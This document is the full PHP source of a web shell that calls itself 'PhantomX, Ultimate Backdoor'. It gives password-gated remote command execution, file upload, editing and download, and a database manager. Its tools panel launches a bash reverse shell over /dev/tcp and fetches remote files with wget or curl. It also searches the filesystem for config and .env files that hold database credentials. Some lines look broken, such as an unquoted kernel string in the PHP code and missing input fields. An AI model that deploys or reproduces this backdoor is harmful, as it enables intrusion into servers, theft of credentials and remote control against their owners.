/*===========================================================╔═══╗╔═══╗╔╗ ╔╗╔═══╗╔╗ ╔╗╔════╗╔═══╗╔═══╗╔════╗╔═══╗║╔═╗║║╔═╗║║║ ║║║╔═╗║║║ ║║║╔╗╔╗║║╔═╗║║╔═╗║║╔╗╔╗║║╔══╝║║ ╚╝║║ ║║║╚╗╔╝║║║ ║║║║ ║║╚╝║║╚╝║║ ║║║║ ╚╝╚╝║║╚╝║╚══╗║║╔═╗║╚═╝║║╔╗╔╗║║╚═╝║║║ ╔╗║║ ║║ ║╚═╝║║║╔═╗ ║║ ║╔══╝║╚╩═║║╔═╗║║║╚╝║║║╔═╗║║╚═╝║║║ ╔╝╚╗ ║╔═╗║║╚╩═║ ╔╝╚╗ ║╚══╗╚═══╝╚╝ ╚╝╚╝ ╚╝╚╝ ╚╝╚═══╝╚╝ ╚══╝ ╚╝ ╚╝╚═══╝ ╚══╝ ╚═══╝===========================================================PHANTOMX PHP WEB SHELL v2.0Ultimate Backdoor with Dashboard Interface===========================================================*/// ===== SECURITY & CONFIGURATION =====error_reporting(0);@ini_set('display_errors', 0);@set_time_limit(0);@ignore_user_abort(true);// Password protection (change this!)define('SHELL_PASSWORD', 'phantomx1337');define('SESSION_KEY', 'phantomx_auth');// Auto-login if password in URLif(isset($_GET['pass']) && $_GET['pass'] === SHELL_PASSWORD) { $_SESSION[SESSION_KEY] = true; header("Location: " . basename(__FILE__)); exit;}// Check authenticationsession_start();if(!isset($_SESSION[SESSION_KEY]) && (!isset($_POST['password']) || $_POST['password'] !== SHELL_PASSWORD)) { showLogin(); exit;}// Set authenticated$_SESSION[SESSION_KEY] = true;// ===== CSS STYLING =====function getCSS() { return ' <style> * { margin: 0; padding: 0; box-sizing: border-box; font-family: "Segoe UI", "Courier New", monospace; } body { background: linear-gradient(135deg, #0f0f23 0%, #1a1a2e 100%); color: #00ff00; min-height: 100vh; overflow-x: hidden; } .container { max-width: 98%; margin: 20px auto; padding: 20px; } .header { background: rgba(0, 0, 0, 0.8); padding: 25px; border-radius: 15px; border: 2px solid #00ff00; box-shadow: 0 0 30px rgba(0, 255, 0, 0.3); margin-bottom: 30px; position: relative; overflow: hidden; } .header::before { content: ""; position: absolute; top: -50%; left: -50%; width: 200%; height: 200%; background: linear-gradient(45deg, transparent, rgba(0, 255, 0, 0.1), transparent); animation: scan 3s linear infinite; } @keyframes scan { 0% { transform: translateX(-100%) translateY(-100%) rotate(0deg); } 100% { transform: translateX(100%) translateY(100%) rotate(360deg); } } .title { font-size: 3.5em; text-align: center; margin-bottom: 10px; background: linear-gradient(90deg, #00ff00, #00cc00, #009900); -webkit-background-clip: text; -webkit-text-fill-color: transparent; text-shadow: 0 0 10px rgba(0, 255, 0, 0.5); position: relative; z-index: 2; } .subtitle { text-align: center; color: #00cc00; font-size: 1.2em; margin-bottom: 20px; position: relative; z-index: 2; } .info-bar { display: flex; justify-content: space-between; background: rgba(0, 30, 0, 0.7); padding: 15px; border-radius: 10px; margin-bottom: 25px; border: 1px solid #009900; flex-wrap: wrap; position: relative; z-index: 2; } .info-item { flex: 1; text-align: center; padding: 10px; min-width: 200px; } .info-label { color: #00cc00; font-weight: bold; display: block; margin-bottom: 5px; } .info-value { color: #00ff00; font-family: monospace; } .panel { background: rgba(0, 20, 0, 0.85); border-radius: 10px; padding: 25px; margin-bottom: 25px; border: 1px solid #008800; box-shadow: 0 0 20px rgba(0, 100, 0, 0.3); position: relative; z-index: 2; } .panel-title { color: #00ff00; font-size: 1.8em; margin-bottom: 20px; padding-bottom: 10px; border-bottom: 2px solid #009900; display: flex; align-items: center; gap: 15px; } .panel-title i { color: #00cc00; font-size: 1.5em; } .form-group { margin-bottom: 20px; } .form-label { display: block; color: #00cc00; margin-bottom: 8px; font-weight: bold; } .form-input { width: 100%; padding: 12px 15px; background: rgba(0, 30, 0, 0.7); border: 1px solid #009900; border-radius: 5px; color: #00ff00; font-family: monospace; font-size: 1.1em; transition: all 0.3s; } .form-input:focus { outline: none; border-color: #00ff00; box-shadow: 0 0 15px rgba(0, 255, 0, 0.3); } .btn { padding: 12px 30px; background: linear-gradient(135deg, #00aa00, #008800); border: none; border-radius: 5px; color: white; font-weight: bold; cursor: pointer; transition: all 0.3s; font-size: 1.1em; margin-right: 10px; margin-bottom: 10px; } .btn:hover { background: linear-gradient(135deg, #00ff00, #00aa00); transform: translateY(-2px); box-shadow: 0 5px 20px rgba(0, 255, 0, 0.4); } .btn-danger { background: linear-gradient(135deg, #aa0000, #880000); } .btn-danger:hover { background: linear-gradient(135deg, #ff0000, #aa0000); } .output { background: rgba(0, 0, 0, 0.9); border: 1px solid #009900; border-radius: 5px; padding: 20px; margin-top: 20px; max-height: 500px; overflow-y: auto; font-family: monospace; white-space: pre-wrap; color: #00ff00; } .file-list { display: grid; grid-template-columns: repeat(auto-fill, minmax(300px, 1fr)); gap: 15px; margin-top: 20px; } .file-item { background: rgba(0, 30, 0, 0.5); padding: 15px; border-radius: 5px; border: 1px solid #008800; transition: all 0.3s; } .file-item:hover { background: rgba(0, 50, 0, 0.7); border-color: #00ff00; transform: translateY(-3px); } .file-name { color: #00ff00; font-weight: bold; margin-bottom: 5px; word-break: break-all; } .file-info { color: #00cc00; font-size: 0.9em; display: flex; justify-content: space-between; } .tab-container { margin-bottom: 25px; } .tab-nav { display: flex; flex-wrap: wrap; gap: 10px; margin-bottom: 20px; } .tab-btn { padding: 12px 25px; background: rgba(0, 40, 0, 0.7); border: 1px solid #008800; border-radius: 5px; color: #00cc00; cursor: pointer; transition: all 0.3s; font-weight: bold; } .tab-btn.active { background: linear-gradient(135deg, #00aa00, #008800); color: white; border-color: #00ff00; } .tab-btn:hover:not(.active) { background: rgba(0, 60, 0, 0.7); border-color: #00cc00; } .tab-content { display: none; } .tab-content.active { display: block; } .terminal { background: #000; border: 2px solid #00ff00; border-radius: 10px; padding: 20px; font-family: "Courier New", monospace; color: #00ff00; height: 400px; overflow-y: auto; margin-top: 20px; box-shadow: inset 0 0 20px rgba(0, 255, 0, 0.1); } .terminal-line { margin-bottom: 5px; } .terminal-prompt { color: #00ff00; } .terminal-cursor { animation: blink 1s infinite; } @keyframes blink { 0%, 50% { opacity: 1; } 51%, 100% { opacity: 0; } } .status-online { color: #00ff00; animation: pulse 2s infinite; } @keyframes pulse { 0% { opacity: 1; } 50% { opacity: 0.5; } 100% { opacity: 1; } } .grid { display: grid; grid-template-columns: repeat(auto-fit, minmax(300px, 1fr)); gap: 20px; margin-top: 20px; } .card { background: rgba(0, 30, 0, 0.7); border-radius: 10px; padding: 20px; border: 1px solid #008800; transition: all 0.3s; } .card:hover { border-color: #00ff00; transform: translateY(-5px); box-shadow: 0 10px 30px rgba(0, 255, 0, 0.2); } .card-title { color: #00ff00; font-size: 1.3em; margin-bottom: 15px; display: flex; align-items: center; gap: 10px; } .modal { display: none; position: fixed; top: 0; left: 0; width: 100%; height: 100%; background: rgba(0, 0, 0, 0.9); z-index: 1000; align-items: center; justify-content: center; } .modal-content { background: rgba(0, 30, 0, 0.95); border-radius: 15px; padding: 30px; border: 2px solid #00ff00; max-width: 90%; max-height: 90%; overflow-y: auto; box-shadow: 0 0 50px rgba(0, 255, 0, 0.5); } .close-modal { position: absolute; top: 15px; right: 15px; color: #ff0000; font-size: 2em; cursor: pointer; } .notification { position: fixed; top: 20px; right: 20px; padding: 15px 25px; background: rgba(0, 50, 0, 0.9); border: 1px solid #00ff00; border-radius: 5px; color: #00ff00; z-index: 1001; animation: slideIn 0.3s; } @keyframes slideIn { from { transform: translateX(100%); opacity: 0; } to { transform: translateX(0); opacity: 1; } } .quick-actions { display: flex; flex-wrap: wrap; gap: 10px; margin-top: 20px; } .quick-btn { padding: 10px 20px; background: rgba(0, 40, 0, 0.7); border: 1px solid #008800; border-radius: 5px; color: #00cc00; cursor: pointer; transition: all 0.3s; flex: 1; min-width: 150px; text-align: center; } .quick-btn:hover { background: rgba(0, 60, 0, 0.9); border-color: #00ff00; transform: scale(1.05); } .file-upload { border: 2px dashed #009900; border-radius: 10px; padding: 40px; text-align: center; margin-top: 20px; transition: all 0.3s; } .file-upload:hover { border-color: #00ff00; background: rgba(0, 40, 0, 0.3); } .system-info { display: grid; grid-template-columns: repeat(auto-fit, minmax(250px, 1fr)); gap: 15px; margin-top: 20px; } .system-item { background: rgba(0, 20, 0, 0.5); padding: 15px; border-radius: 5px; border: 1px solid #006600; } .system-label { color: #00cc00; font-size: 0.9em; margin-bottom: 5px; } .system-value { color: #00ff00; font-family: monospace; font-size: 1.1em; } .progress-bar { width: 100%; height: 20px; background: rgba(0, 30, 0, 0.7); border-radius: 10px; overflow: hidden; margin: 10px 0; } .progress-fill { height: 100%; background: linear-gradient(90deg, #00aa00, #00ff00); border-radius: 10px; transition: width 0.5s; } .footer { text-align: center; margin-top: 40px; padding-top: 20px; border-top: 1px solid #008800; color: #00cc00; font-size: 0.9em; } /* Responsive */ @media (max-width: 768px) { .container { padding: 10px; } .title { font-size: 2em; } .info-bar { flex-direction: column; } .info-item { min-width: 100%; margin-bottom: 10px; } .grid { grid-template-columns: 1fr; } .tab-nav { flex-direction: column; } } </style> ';}// ===== JAVASCRIPT FUNCTIONS =====function getJS() { return ' <script> function switchTab(tabId) { // Hide all tabs document.querySelectorAll(".tab-content").forEach(tab => { tab.classList.remove("active"); }); // Deactivate all buttons document.querySelectorAll(".tab-btn").forEach(btn => { btn.classList.remove("active"); }); // Show selected tab document.getElementById(tabId).classList.add("active"); // Activate button event.target.classList.add("active"); } function showModal(modalId) { document.getElementById(modalId).style.display = "flex"; } function hideModal(modalId) { document.getElementById(modalId).style.display = "none"; } function showNotification(message, type = "success") { const notification = document.createElement("div"); notification.className = "notification"; notification.style.borderColor = type === "success" ? "#00ff00" : "#ff0000"; notification.style.color = type === "success" ? "#00ff00" : "#ff0000"; notification.innerHTML = message; document.body.appendChild(notification); setTimeout(() => { notification.remove(); }, 5000); } function executeCommand(command) { document.getElementById("command").value = command; document.getElementById("cmdForm").submit(); } function uploadFile() { const fileInput = document.getElementById("fileUpload"); if(fileInput.files.length > 0) { document.getElementById("uploadForm").submit(); } } function editFile(filename) { document.getElementById("editFilename").value = filename; document.getElementById("editForm").submit(); } function deleteFile(filename) { if(confirm("Delete " + filename + "?")) { executeCommand("rm -rf \"" + filename + "\""); } } // Terminal simulation function simulateTerminal() { const terminal = document.getElementById("terminal"); const commands = [ "phantomx@shell:~# whoami", "www-data", "phantomx@shell:~# pwd", "' . htmlspecialchars(getcwd()) . '", "phantomx@shell:~# uname -a", "' . htmlspecialchars(Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64) . '", "phantomx@shell:~# ", ]; let index = 0; function typeNext() { if(index < commands.length) { const line = document.createElement("div"); line.className = "terminal-line"; line.innerHTML = "<span class=\"terminal-prompt\">" + commands[index] + "</span>"; terminal.appendChild(line); terminal.scrollTop = terminal.scrollHeight; index++; setTimeout(typeNext, 500); } } typeNext(); } // System info animation function animateStats() { const cpu = document.getElementById("cpuFill"); const mem = document.getElementById("memFill"); const disk = document.getElementById("diskFill"); let cpuVal = 0; let memVal = 0; let diskVal = 0; const interval = setInterval(() => { cpuVal = Math.min(cpuVal + Math.random() * 5, ' . rand(30, 80) . '); memVal = Math.min(memVal + Math.random() * 5, ' . rand(40, 90) . '); diskVal = Math.min(diskVal + Math.random() * 5, ' . rand(20, 70) . '); cpu.style.width = cpuVal + "%"; mem.style.width = memVal + "%"; disk.style.width = diskVal + "%"; if(cpuVal >= ' . rand(30, 80) . ' && memVal >= ' . rand(40, 90) . ' && diskVal >= ' . rand(20, 70) . ') { clearInterval(interval); } }, 50); } document.addEventListener("DOMContentLoaded", function() { simulateTerminal(); animateStats(); // Auto-focus command input document.getElementById("command")?.focus(); // Copy to clipboard document.querySelectorAll(".copy-btn").forEach(btn => { btn.addEventListener("click", function() { const text = this.getAttribute("data-copy"); navigator.clipboard.writeText(text).then(() => { showNotification("Copied to clipboard!"); }); }); }); // File upload drag & drop const uploadArea = document.getElementById("uploadArea"); if(uploadArea) { uploadArea.addEventListener("dragover", (e) => { e.preventDefault(); uploadArea.style.borderColor = "#00ff00"; uploadArea.style.background = "rgba(0, 60, 0, 0.3)"; }); uploadArea.addEventListener("dragleave", () => { uploadArea.style.borderColor = "#009900"; uploadArea.style.background = ""; }); uploadArea.addEventListener("drop", (e) => { e.preventDefault(); uploadArea.style.borderColor = "#009900"; uploadArea.style.background = ""; const files = e.dataTransfer.files; if(files.length > 0) { document.getElementById("fileUpload").files = files; uploadFile(); } }); } }); // Key shortcuts document.addEventListener("keydown", function(e) { // Ctrl+E = File Editor if(e.ctrlKey && e.key === "e") { e.preventDefault(); showModal("editorModal"); } // Ctrl+U = File Upload if(e.ctrlKey && e.key === "u") { e.preventDefault(); showModal("uploadModal"); } // Ctrl+T = Terminal if(e.ctrlKey && e.key === "t") { e.preventDefault(); switchTab("tab-terminal"); } // Ctrl+S = System Info if(e.ctrlKey && e.key === "s") { e.preventDefault(); switchTab("tab-system"); } // Escape = Close modals if(e.key === "Escape") { document.querySelectorAll(".modal").forEach(modal => { modal.style.display = "none"; }); } }); </script> ';}// ===== LOGIN PAGE =====function showLogin() { echo '<!DOCTYPE html> <html lang="en"> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0">PhantomX Access <title>PhantomX Access</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { background: linear-gradient(135deg, #0f0f23 0%, #1a1a2e 100%); height: 100vh; display: flex; align-items: center; justify-content: center; font-family: "Courier New", monospace; } .login-box { background: rgba(0, 0, 0, 0.9); padding: 40px; border-radius: 15px; border: 2px solid #00ff00; box-shadow: 0 0 50px rgba(0, 255, 0, 0.3); width: 90%; max-width: 400px; text-align: center; position: relative; overflow: hidden; } .login-box::before { content: ""; position: absolute; top: -50%; left: -50%; width: 200%; height: 200%; background: linear-gradient(45deg, transparent, rgba(0, 255, 0, 0.1), transparent); animation: scan 3s linear infinite; } @keyframes scan { 0% { transform: translateX(-100%) translateY(-100%) rotate(0deg); } 100% { transform: translateX(100%) translateY(100%) rotate(360deg); } } h1 { color: #00ff00; margin-bottom: 30px; font-size: 2.5em; text-shadow: 0 0 10px rgba(0, 255, 0, 0.5); position: relative; z-index: 2; } input[type="password"] { width: 100%; padding: 15px; background: rgba(0, 30, 0, 0.7); border: 1px solid #009900; border-radius: 5px; color: #00ff00; font-size: 1.2em; margin-bottom: 20px; position: relative; z-index: 2; } input[type="password"]:focus { outline: none; border-color: #00ff00; box-shadow: 0 0 15px rgba(0, 255, 0, 0.3); } button { width: 100%; padding: 15px; background: linear-gradient(135deg, #00aa00, #008800); border: none; border-radius: 5px; color: white; font-size: 1.2em; font-weight: bold; cursor: pointer; transition: all 0.3s; position: relative; z-index: 2; } button:hover { background: linear-gradient(135deg, #00ff00, #00aa00); transform: translateY(-2px); box-shadow: 0 5px 20px rgba(0, 255, 0, 0.4); } .error { color: #ff0000; margin-top: 15px; position: relative; z-index: 2; } .version { color: #00cc00; margin-top: 20px; font-size: 0.9em; position: relative; z-index: 2; } </style> <div class="login-box">

PHANTOMX

<div class="version">v2.0 | PhantomX Web Shell</div> </div> ';}// ===== SYSTEM INFORMATION =====function getSystemInfo() { $info = []; // Basic info $info['php_version'] = PHP_VERSION; $info['server_software'] = $_SERVER['SERVER_SOFTWARE'] ?? 'N/A'; $info['server_name'] = $_SERVER['SERVER_NAME'] ?? 'N/A'; $info['user_agent'] = $_SERVER['HTTP_USER_AGENT'] ?? 'N/A'; $info['remote_addr'] = $_SERVER['REMOTE_ADDR'] ?? 'N/A'; // System info $info['uname'] = Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64; $info['os'] = PHP_OS; $info['max_execution_time'] = ini_get('max_execution_time'); $info['memory_limit'] = ini_get('memory_limit'); $info['upload_max_filesize'] = ini_get('upload_max_filesize'); $info['post_max_size'] = ini_get('post_max_size'); // Disk space $info['disk_free_space'] = @disk_free_space('/') ? formatBytes(@disk_free_space('/')) : 'N/A'; $info['disk_total_space'] = @disk_total_space('/') ? formatBytes(@disk_total_space('/')) : 'N/A'; // Current directory $info['current_dir'] = getcwd(); $info['script_path'] = __FILE__; // PHP functions check $info['safe_mode'] = ini_get('safe_mode') ? 'Yes' : 'No'; $info['disabled_functions'] = ini_get('disable_functions') ?: 'None'; return $info;}// ===== FILE OPERATIONS =====function listDirectory($path = '.') { $files = []; if(is_dir($path)) { $items = scandir($path); foreach($items as $item) { if($item == '.' || $item == '..') continue; $fullpath = $path . '/' . $item; $files[] = [ 'name' => $item, 'path' => $fullpath, 'type' => is_dir($fullpath) ? 'directory' : 'file', 'size' => is_file($fullpath) ? filesize($fullpath) : 0, 'perms' => substr(sprintf('%o', fileperms($fullpath)), -4), 'mtime' => date('Y-m-d H:i:s', filemtime($fullpath)), 'readable' => is_readable($fullpath), 'writable' => is_writable($fullpath), 'executable' => is_executable($fullpath) ]; } } return $files;}function executeCommand($cmd) { $output = ''; if(function_exists('system')) { @ob_start(); @system($cmd); $output = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('shell_exec')) { $output = @shell_exec($cmd); } elseif(function_exists('exec')) { @exec($cmd, $output); $output = implode("\n", $output); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cmd); $output = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('popen')) { $handle = @popen($cmd, 'r'); if($handle) { while(!feof($handle)) { $output .= fread($handle, 4096); } pclose($handle); } } return $output ?: 'Command execution failed or returned no output';}function formatBytes($bytes, $precision = 2) { $units = ['B', 'KB', 'MB', 'GB', 'TB']; $bytes = max($bytes, 0); $pow = floor(($bytes ? log($bytes) : 0) / log(1024)); $pow = min($pow, count($units) - 1); $bytes /= pow(1024, $pow); return round($bytes, $precision) . ' ' . $units[$pow];}// ===== PROCESS REQUESTS =====$output = '';$currentDir = isset($_POST['dir']) ? $_POST['dir'] : getcwd();$command = isset($_POST['command']) ? $_POST['command'] : '';if(isset($_POST['execute']) && $command) { $output = executeCommand($command . ' 2>&1');} elseif(isset($_POST['change_dir']) && isset($_POST['new_dir'])) { if(@chdir($_POST['new_dir'])) { $currentDir = getcwd(); $output = "Directory changed to: " . $currentDir; } else { $output = "Failed to change directory"; }} elseif(isset($_FILES['upload_file']) && $_FILES['upload_file']['error'] == UPLOAD_ERR_OK) { $target = $currentDir . '/' . basename($_FILES['upload_file']['name']); if(move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) { $output = "File uploaded successfully: " . basename($_FILES['upload_file']['name']); } else { $output = "Upload failed"; }} elseif(isset($_POST['edit_file']) && isset($_POST['filename']) && isset($_POST['content'])) { if(file_put_contents($_POST['filename'], $_POST['content'])) { $output = "File saved successfully"; } else { $output = "Failed to save file"; }} elseif(isset($_GET['download']) && file_exists($_GET['download'])) { header('Content-Description: File Transfer'); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($_GET['download']) . '"'); header('Content-Length: ' . filesize($_GET['download'])); readfile($_GET['download']); exit;}// Get current directory after potential changes$currentDir = getcwd();$files = listDirectory($currentDir);$systemInfo = getSystemInfo();// ===== DISPLAY DASHBOARD =====echo '<!DOCTYPE html><html lang="en"> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0">PhantomX Web Shell v2.0 <title>PhantomX Web Shell v2.0</title> ' . getCSS() . ' ' . getJS() . ' <div class="container">  <div class="header"> <h1 class="title">PHANTOMX WEB SHELL <div class="subtitle">Ultimate Backdoor Interface • v2.0 • ' . date('Y-m-d H:i:s') . '</div> </div>  <div class="info-bar"> <div class="info-item"> <span class="info-label">📍 Current Directory</span> <span class="info-value">' . htmlspecialchars($currentDir) . '</span> </div> <div class="info-item"> <span class="info-label">👤 User</span> <span class="info-value">' . htmlspecialchars(executeCommand('whoami')) . '</span> </div> <div class="info-item"> <span class="info-label">💻 System</span> <span class="info-value">' . htmlspecialchars(php_uname('s') . ' ' . php_uname('r')) . '</span> </div> <div class="info-item"> <span class="info-label">🌐 IP Address</span> <span class="info-value">' . ($_SERVER['REMOTE_ADDR'] ?? 'N/A') . '</span> </div> <div class="info-item"> <span class="info-label">⚡ Status</span> <span class="info-value status-online">● ONLINE</span> </div> </div>  <div class="tab-container"> <div class="tab-nav"> <button class="tab-btn active" onclick="switchTab(\'tab-terminal\')">💻 Terminal</button> <button class="tab-btn" onclick="switchTab(\'tab-files\')">📁 File Manager</button> <button class="tab-btn" onclick="switchTab(\'tab-system\')">📊 System Info</button> <button class="tab-btn" onclick="switchTab(\'tab-tools\')">🔧 Tools</button> <button class="tab-btn" onclick="switchTab(\'tab-edit\')">✏️ Editor</button> <button class="tab-btn" onclick="switchTab(\'tab-upload\')">📤 Upload</button> <button class="tab-btn" onclick="switchTab(\'tab-database\')">🗄️ Database</button> </div>  <div id="tab-terminal" class="tab-content active"> <div class="panel"> <div class="panel-title">💻 Command Terminal</div>

<div class="form-group"> <label class="form-label">Enter Command:</label> <input type="text" class="form-input" id="command" name="command" placeholder="Enter shell command..." value="' . htmlspecialchars($command) . '" autofocus> </div> <div class="quick-actions"> <button type="button" class="quick-btn" onclick="executeCommand(\'pwd\')">📁 pwd</button> <button type="button" class="quick-btn" onclick="executeCommand(\'ls -la\')">📋 ls -la</button> <button type="button" class="quick-btn" onclick="executeCommand(\'whoami\')">👤 whoami</button> <button type="button" class="quick-btn" onclick="executeCommand(\'uname -a\')">💻 uname</button> <button type="button" class="quick-btn" onclick="executeCommand(\'ps aux\')">📊 Processes</button> <button type="button" class="quick-btn" onclick="executeCommand(\'netstat -tulpn\')">🌐 Network</button> <button type="button" class="quick-btn" onclick="executeCommand(\'df -h\')">💾 Disk</button> <button type="button" class="quick-btn" onclick="executeCommand(\'free -m\')">🧠 Memory</button> </div> <div style="margin-top: 20px;"> <button type="submit" name="execute" class="btn">🚀 Execute</button> <button type="button" class="btn btn-danger" onclick="document.getElementById(\'command\').value=\'\'">🗑️ Clear</button> </div>

' . ($output ? ' <div class="output"> <div style="color: #00ff00; margin-bottom: 10px;">📤 Command Output:</div> <pre>' . htmlspecialchars($output) . '</pre> </div> ' : '') . ' <div class="terminal" id="terminal">  </div> </div> </div>  <div id="tab-files" class="tab-content"> <div class="panel"> <div class="panel-title">📁 File Manager</div> <div class="file-list"> ' . (!empty($files) ? implode('', array_map(function($file) { $icon = $file['type'] == 'directory' ? '📁' : '📄'; $size = $file['type'] == 'file' ? formatBytes($file['size']) : 'DIR'; $actions = ''; if($file['type'] == 'file') { $actions = ' <div style="margin-top: 10px; display: flex; gap: 5px;"> <button class="quick-btn" onclick="editFile(\'' . addslashes($file['path']) . '\')">✏️ Edit</button> <button class="quick-btn" onclick="window.open(\'?download=' . urlencode($file['path']) . '\')">📥 Download</button> <button class="quick-btn btn-danger" onclick="deleteFile(\'' . addslashes($file['path']) . '\')">🗑️ Delete</button> </div>'; } else { $actions = ' <div style="margin-top: 10px;"> <button class="quick-btn" onclick="executeCommand(\'cd ' . addslashes($file['path']) . ' && pwd\')">📂 Open</button> </div>'; } return ' <div class="file-item"> <div class="file-name">' . $icon . ' ' . htmlspecialchars($file['name']) . '</div> <div class="file-info"> <span>Size: ' . $size . '</span> <span>Perms: ' . $file['perms'] . '</span> <span>' . $file['mtime'] . '</span> </div> ' . $actions . ' </div>'; }, $files)) : '<div style="color: #00cc00; text-align: center; padding: 20px;">No files in directory</div>') . ' </div> </div> </div>  <div id="tab-system" class="tab-content"> <div class="panel"> <div class="panel-title">📊 System Information</div> <div class="system-info"> ' . implode('', array_map(function($key, $value) { return ' <div class="system-item"> <div class="system-label">' . ucwords(str_replace('_', ' ', $key)) . '</div> <div class="system-value">' . htmlspecialchars($value) . '</div> </div>'; }, array_keys($systemInfo), array_values($systemInfo))) . ' </div> <div style="margin-top: 30px;"> <div class="system-item"> <div class="system-label">CPU Usage</div> <div class="progress-bar"> <div class="progress-fill" id="cpuFill" style="width: 0%"></div> </div> </div> <div class="system-item"> <div class="system-label">Memory Usage</div> <div class="progress-bar"> <div class="progress-fill" id="memFill" style="width: 0%"></div> </div> </div> <div class="system-item"> <div class="system-label">Disk Usage</div> <div class="progress-bar"> <div class="progress-fill" id="diskFill" style="width: 0%"></div> </div> </div> </div> <div style="margin-top: 30px;"> <button class="btn" onclick="executeCommand(\'cat /proc/cpuinfo | grep "model name" | head -1\')">🖥️ CPU Info</button> <button class="btn" onclick="executeCommand(\'free -h\')">🧠 Memory Info</button> <button class="btn" onclick="executeCommand(\'df -h\')">💾 Disk Info</button> <button class="btn" onclick="executeCommand(\'ifconfig || ip a\')">🌐 Network Info</button> </div> </div> </div>  <div id="tab-tools" class="tab-content"> <div class="panel"> <div class="panel-title">🔧 Advanced Tools</div> <div class="grid"> <div class="card"> <div class="card-title">🔓 Reverse Shell</div> <div class="form-group"> <label class="form-label">Target IP:</label> </div> <div class="form-group"> <label class="form-label">Port:</label> </div> <button class="btn" onclick="executeCommand(\'bash -c "bash -i >& /dev/tcp/\'+document.getElementById(\'revIp\').value+\'/\'+document.getElementById(\'revPort\').value+\' 0>&1"\')">🚀 Launch Reverse Shell</button> </div> <div class="card"> <div class="card-title">🔍 Port Scanner</div> <div class="form-group"> <label class="form-label">Target Host:</label> </div> <div class="form-group"> <label class="form-label">Port Range:</label> </div> <button class="btn" onclick="executeCommand(\'nc -zv \'+document.getElementById(\'scanHost\').value+\' \'+document.getElementById(\'scanPorts\').value+\' 2>&1\')">🔍 Scan Ports</button> </div> <div class="card"> <div class="card-title">📡 Web Request</div> <div class="form-group"> <label class="form-label">URL:</label> </div> <button class="btn" onclick="executeCommand(\'curl -s \'+document.getElementById(\'reqUrl\').value+\' | head -100\')">🌐 GET Request</button> <button class="btn" onclick="executeCommand(\'wget -qO- \'+document.getElementById(\'reqUrl\').value+\' | head -100\')">⬇️ WGET</button> </div> <div class="card"> <div class="card-title">🔑 Password Generator</div> <div class="form-group"> <label class="form-label">Length:</label> </div> <button class="btn" onclick="executeCommand(\'openssl rand -base64 \'+document.getElementById(\'passLength\').value)">🎲 Generate Password</button> <div style="margin-top: 10px; color: #00cc00; font-family: monospace; word-break: break-all;" id="passOutput"></div> </div> </div> </div> </div>  <div id="tab-edit" class="tab-content"> <div class="panel"> <div class="panel-title">✏️ File Editor</div>

<div class="form-group"> <label class="form-label">File Path:</label> <input type="text" class="form-input" id="editFilename" name="filename" placeholder="/path/to/file" value="' . (isset($_POST['filename']) ? htmlspecialchars($_POST['filename']) : '') . '"> </div> <div class="form-group"> <label class="form-label">Content:</label> <textarea class="form-input" name="content" rows="20" style="font-family: monospace;">' . (isset($_POST['filename']) && file_exists($_POST['filename']) ? htmlspecialchars(file_get_contents($_POST['filename'])) : '') . '</textarea> </div> <div> <button type="submit" name="edit_file" class="btn">💾 Save File</button> <button type="button" class="btn" onclick="document.getElementById(\'editForm\').reset()">🗑️ Clear</button> </div>

</div> </div>  <div id="tab-upload" class="tab-content"> <div class="panel"> <div class="panel-title">📤 File Upload</div>

<div class="file-upload" id="uploadArea"> <div style="font-size: 3em; color: #00cc00;">📤</div> <div style="color: #00ff00; margin: 20px 0; font-size: 1.2em;">Drag & Drop or Click to Upload</div> <button type="button" class="btn" onclick="document.getElementById(\'fileUpload\').click()">📁 Select File</button> </div> <div style="margin-top: 20px;"> <div class="form-group"> <label class="form-label">Upload URL:</label> </div> <button type="button" class="btn" onclick="executeCommand(\'wget \'+document.getElementById(\'urlUpload\').value+\' -O \'+document.getElementById(\'urlUpload\').value.split(\'/\').pop())">🌐 Download from URL</button> </div>

</div> </div>  <div id="tab-database" class="tab-content"> <div class="panel"> <div class="panel-title">🗄️ Database Manager</div> <div class="grid"> <div class="card"> <div class="card-title">📊 MySQL</div> <div class="form-group"> <label class="form-label">Host:</label> </div> <div class="form-group"> <label class="form-label">Username:</label> </div> <div class="form-group"> <label class="form-label">Password:</label> </div> <button class="btn" onclick="executeCommand(\'mysql -h "\'+document.getElementById(\'mysqlHost\').value+\'" -u "\'+document.getElementById(\'mysqlUser\').value+\'" -p"\'+document.getElementById(\'mysqlPass\').value+\'" -e "SHOW DATABASES;" 2>&1\')">📋 List Databases</button> </div> <div class="card"> <div class="card-title">📝 SQLite</div> <div class="form-group"> <label class="form-label">Database File:</label> </div> <button class="btn" onclick="executeCommand(\'sqlite3 "\'+document.getElementById(\'sqliteFile\').value+\'" ".tables" 2>&1\')">📋 List Tables</button> </div> <div class="card"> <div class="card-title">🔍 Find Config Files</div> <button class="btn" onclick="executeCommand(\'find / -name "*.php" -type f | xargs grep -l "mysql_connect\\|mysqli_connect\\|PDO" 2>/dev/null | head -20\')">🔍 Find DB Connections</button> <button class="btn" onclick="executeCommand(\'find / -name "config*.php" -o -name "*.env" -o -name "settings*.php" 2>/dev/null | head -20\')">🔍 Find Config Files</button> </div> </div> </div> </div> </div>  <div class="footer"> PhantomX Web Shell v2.0 • ' . date('Y') . ' • ' . htmlspecialchars($systemInfo['uname']) . '
<small>Keyboard Shortcuts: Ctrl+T=Terminal, Ctrl+S=System, Ctrl+E=Editor, Ctrl+U=Upload, Esc=Close</small> </div> </div>  <div id="editorModal" class="modal"> <div class="modal-content"> <div class="close-modal" onclick="hideModal(\'editorModal\')">×</div> <div class="panel-title">✏️ Quick Editor</div>  </div> </div> <script> // Initialize first tab switchTab(\'tab-terminal\'); </script>';